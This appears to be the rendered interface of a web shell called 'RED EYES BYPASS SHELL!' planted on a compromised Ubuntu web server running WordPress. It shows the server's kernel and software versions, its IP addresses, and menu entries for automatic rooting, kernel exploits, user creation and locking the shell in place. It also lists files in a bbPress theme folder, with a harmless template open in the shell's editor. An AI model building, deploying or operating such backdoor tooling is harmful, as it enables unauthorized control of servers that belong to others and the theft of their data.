Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
bigdata /
wp-content /
themes /
kadence /
bbpress /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
content-archive-forum.php
648
B
-rwxr-xr-x
form-reply-search.php
753
B
-rwxr-xr-x
form-reply.php
7.79
KB
-rwxr-xr-x
form-search.php
802
B
-rwxr-xr-x
form-topic-search.php
753
B
-rwxr-xr-x
form-topic.php
8.42
KB
-rwxr-xr-x
loop-search-reply.php
1.82
KB
-rwxr-xr-x
loop-search-topic.php
1.95
KB
-rwxr-xr-x
loop-single-reply.php
1.37
KB
-rwxr-xr-x
loop-single-topic.php
3.1
KB
-rwxr-xr-x
loop-topics.php
991
B
-rwxr-xr-x
pagination-replies.php
537
B
-rwxr-xr-x
pagination-topics.php
537
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : loop-topics.php
<?php /** * Topics Loop * * @package bbPress * @subpackage Theme */ // Exit if accessed directly defined( 'ABSPATH' ) || exit; do_action( 'bbp_template_before_topics_loop' ); ?> <ul id="bbp-forum-<?php bbp_forum_id(); ?>" class="bbp-topics"> <li class="bbp-header"> <ul class="forum-titles"> <li class="bbp-topic-title"><?php esc_html_e( 'Topic', 'kadence' ); ?></li> <li class="bbp-topic-freshness"><?php esc_html_e( 'Last Post', 'kadence' ); ?></li> </ul> </li> <li class="bbp-body"> <?php while ( bbp_topics() ) : bbp_the_topic(); ?> <?php bbp_get_template_part( 'loop', 'single-topic' ); ?> <?php endwhile; ?> </li> <li class="bbp-footer"> <div class="tr"> <p> <span class="td colspan<?php echo ( bbp_is_user_home() && ( bbp_is_favorites() || bbp_is_subscriptions() ) ) ? '5' : '4'; ?>"> </span> </p> </div><!-- .tr --> </li> </ul><!-- #bbp-forum-<?php bbp_forum_id(); ?> --> <?php do_action( 'bbp_template_after_topics_loop' );
Close